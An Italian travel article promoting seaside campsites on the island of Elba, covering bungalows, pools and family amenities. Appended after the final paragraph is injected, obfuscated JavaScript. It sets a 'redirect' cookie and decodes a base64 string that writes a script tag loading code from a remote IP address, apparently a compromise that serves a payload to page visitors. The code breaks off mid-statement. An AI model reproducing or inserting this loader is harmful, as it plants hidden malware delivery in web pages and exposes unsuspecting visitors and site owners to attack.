Arriva l’estate: alla scoperta dei campeggi dell’isola d’Elba
Se quest’anno avete deciso di trascorrere la vostra vacanza in tenda, sia che voi siate dei campeggiatori già esperti sia che vogliate provarlo per la prima volta non c’è meta migliore di un campeggio sul mare nell’Isola d’Elba. Un’alternativa economica e divertente all’insegna dell’avventura e della riscoperta del contatto diretto con la natura, il campeggio è perfetto per chi ama la vita all’aria aperta e la libertà estrema; consente di fare tantissime amicizie, di spendere poco, spostarsi ogni giorno e avere così la possibilità di conoscere posti nuovi e nuove persone.
Scegliere uno dei campeggi all’Isola d’Elba vicino al mare vi darà la possibilità di godervi appieno un paesaggio unico ed incontaminato. Soprattutto per chi è alle prime armi, l’Isola d’Elba è una meta ideale per provare l’esperienza del campeggio al mare. Ubicati nelle zone più suggestive dell’isola, direttamente sul mare o a pochissima distanza, quasi tutti i campeggi dell’Isola d’Elba propongono oltre alle classiche piazzole per tende, piccoli chalets, appartamenti e bungalow.
Immaginare un luogo spartano è senza dubbio riduttivo, visti i comfort che molte di queste strutture sono in grado di offrire: moltissimi campeggi dell’isola d’Elba con bungalow sul mare sono infatti anche dotati di minimarket, bar, parchi giochi per bambini, animazione e molto altro. Per chi si muove con i bambini inoltre, molto comodi sono i campeggi all’Isola d’Elba con piscina, nella quale i piccoli possono seguire corsi ed attività ludiche, mentre per chi non vuole rinunciare alla vicinanza dell’acqua salata, è possibile optare anche per campeggi sull’isola d’Elba con piscina direttamente sul mare, in modo da conciliare entrambe le esigenze.
Se vi attira la suggestiva opportunità di dormire sotto le stelle ed assaporare una vacanza in totale armonia con il paesaggio, o semplicemente avete un budget ridotto, scegliete una vacanza in campeggio al mare sull’Isola d’Elba. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘